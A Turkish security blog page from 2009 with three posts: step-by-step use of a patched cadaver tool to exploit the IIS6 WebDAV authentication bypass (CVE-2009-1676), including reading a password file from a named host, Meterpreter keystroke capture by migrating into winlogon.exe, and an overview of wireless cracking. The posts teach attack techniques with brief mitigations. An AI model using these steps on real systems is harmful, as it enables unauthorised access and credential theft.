Bilgi Güvenliği Günlüğü.

22 May 2009

Microsoft IIS6 WebDav Remote Auth Bypass Güvenlik Zaafiyeti

Filed under: Görsel Anlatımlar,Güvenlik,Haberler — Tags: , , — admin @ 18:44

CVE-2009-1676 güvenlik bülteni ile Microsoft IIS 6.0 web sunucusunun dosya paylaşımı için kullandığı “Webdav” servisinde uzakdan kimlik doğrulamayı bypass eden bir zaafiyet bulunduğu duyuruldu.

Web sunucuda bulunan klasorlere ve dosyalara erişim için Windows Authentication gerektiren kimlik doğrulama unicode kullanılarak bypass edilebiliniyor.
Yetki dahilinde dosya okumak, dizin listelemek ve uzak sunucuya dosya yazmak (içerik eklemek) mümkün.

Bu makalede bu işlemin nasıl yapıldığı ve korunma yollarına değinilmiştir.

Aktif Webdav Servisinin Tespiti

IIS 5.0 da Webdav servisi varsayılan olarak açık gelir.IIS 6.0 sunucularda ise webdav servisi varsayılan olarak aktif değildir.

IIS sunucuda Webdav servisinin aktif olduğunu Nmap NSE sciprti ve Enumaration araçları ile tespit edebiliriz.

Nmap NSE scriptine http://ack-rst.com/scripts/webdav.nse adresinden ulaşabilirsiniz.

Nmap ile ozan.net adresindeki IIS 6 sunucunun Webdav servisinin aktif olduğunu öğrendik.

Exploit (Suistimal)

Bu zaafiyeti kullanarak hedef sistemde yapılacak işlemler hakkında aşağıdaki videoyu izleyebilirsiniz.

http://www.cehturkiye.com/iis6webdav/iis6webdav.html

Bilgisayarınıza indirmek için ;
http://www.4shared.com/file/107065019/de6006aa/iis6webdavvulnerabilty.html

Skullsecurity.org tarafından açığı sömüren otomize edilmiş bir betik yayımlandı.

Kurulumu ve kullanımı aşağıdaki gibidir ;
1-mkdir webdav
2-cd webdav
3-wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
——
4-wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
——
5-tar xzvf cadaver-0.23.2.tar.gz
——
6- cd cadaver-0.23.2/
7- patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
7-./configure
——
8- make
——

Yukarıdaki adımlardan sonra “cadaver” aracı kurulmuş olucak.

./cadaver xx.xx.xx.xx şeklinde kullanabilirsiniz.

Artık dav:/> satırına düştükden sonra savunmasız dizine geçebilir.Neler olduğunu görüntüleyerek yetki dahilinde istediğiniz işlemi yapabilirsiniz.

Yapılacak işlemler için aşağıdaki komutlar kullanılır ;
* CD
* LS
* MOVE
* PUT
* GET
* CAT
* DELETE

ozan.net hedefi exploit edilerek, “gizli” klasorundeki “parola.txt” içeriği okunmuştur.

Bu zaafiyetten korunmak için;
- Webdav servisi kullanılmıyorsa kapatın.
-Webdav ile paylaşılan klasorlerin/dosyaların yetkilerini düzenleyin
-Microsoft’un yama çıkarmasını bekleyin :(
-Eğer bir IDS/IPS sisteminiz var imza veritabanını güncelleyin.

27 March 2009

Meterpreter ile Klavye Girişlerini Yakalamak (Keystroke Sniffing)

Filed under: Ethical Hacker,Görsel Anlatımlar,Püf Noktalar — Tags: , , , — admin @ 13:48

Kısa süre önce meterpreter payloadına yeni kodlar eklendi.Yeni özellikler kazandırılan meterpreter payloadı ile klavye girişlerini yakalamak (sniff etmek) mümkün.
“migrate” komutu ile istenilen uygulamaya enjekte olunarak “keyscan_start” ve “keyscan_dump” komutları ile klavye girişleri yakalanabiliniyor.

Örnek bir kullanım için, Windows XP SP3 sisteme Ms08-067 exploiti ile meterpreter payloadını karşıya yükleyip komut satırını aldığımızı varsayalım.

Oturum Açma Bilgilerini Yakalama
Oturum elde edildikden sonra “ps” komutu ile hedef sistemde çalışan uygulamalar ile PID değerlerleri listelenir.

Windows sistemlerde kimlik doğrulama winlogon.exe (Microsoft Windows Logon Process) aracılığıyla yapılır. (bknz:resim 1)

“migrate” komutu ile bu uygulamaya enjekte olup, “keyscan_start” komutu ile klavye girdilerini yakalama işlemini başlatalım.Sisteme herhangi bir girişyapıldığında bu bilgileri “keyscan_dump” komutu ile elde edebiliriz. (bknz: resim 2)

Klavye Girişlerini Yakalama

Oturum açma sonrası, “migrate” komutu ile explorer.exe’ye enjekte olunarak “keyscan_start” komutu ile klavye girdileri dinlenir ve “keyscan_dump” ile yakalanan veriler okunur. (bknz: resim3 ve resim 4)

yukarıdaki resimde görüldüğü üzre, tüm klavye girdileri yakanlanmış …

11 January 2009

Kablosuz Ağları Kırmak – Wireless Network Hacking

Filed under: Görsel Anlatımlar,Güvenlik — Tags: , , , , , , — admin @ 02:05

Wireless Hacking
Wireless network teknolojisi gittikçe popülerleşmekte fakat aynı zamanda güvenlik açıkları ortaya çıkmaktadır.Wireless teknolojisi iki özelliğiyle popülerleşmektedir, rahat olması ve ücretler ile.

Kablosuz lan teknolojisi çalışanların dijital kaynaklara masalarına bağlı kalmadan ulaşmalarını sağlamaktadır.
Laptoplar toplantılara götürülebilir , yada cafelerden wireless networklere dahil olabilir.

İş ve wireless saldırıları
Firmalar wireless networklere talep gösterdikçe wireles networklerin güvenlikleri derinleşmiştir.
İşler fiziksel girişe gerek duymayan hackerlar yüzünden , ücretsiz edinilebilen araçlar sayesinde yüksek tehlike altındadırlar.
Warchalking, Wardriving, Warflying hackerların networklere ulaşmada kullandığı yöntemler arasındadır.

Terminoloji :
Warhalking : Etrafta dolaşıp Wireless networkleri araştırmak .
Wardriving : Araba ile dolaşıp Wireless networkleri araştırmak
WarFlying : Uçarak Wireless networkleri araştırmak. (Uçark , helikopter gibi)
WarChalking : Açık networkleri tebeşirle işaretlemek.(Duvara,direğe, ota çöpe işaretlemek)
Blue jacking : Bluetooth kullanarak cep telefonlarını hacklemek.
Global Positioning System (GPS) : Bulunan networklerin yerini öğrenmek için kullanılır.

Kablosuz ağlarda güvenlik seçeneklerinin bazıları;
-Open Security
-WEP
-WPA
-Wireless Gateway
-RADIUS / WPA-RADIUS
-RSN
-Özel Çözümler (Cihazlara özel güvenlik ayarları,Sertifikalı kimlik doğrulama vs.)

Örnek bir saldırı;

Wep ile şifrelenmiş wireless networkün kırılması videosunu tam ekran izlemek için ;
http://cehturkiye.com//wireless-hacking/wep-cracking.html

Videoyu bilgisayarınıza indirmek için ;
http://www.4shared.com/file/80006826/72325013/wireless-hacking.html adresine gidebilirsiniz.

Korunmak için, size uygun çözümü seçin :)

Older Posts »

Powered by WordPress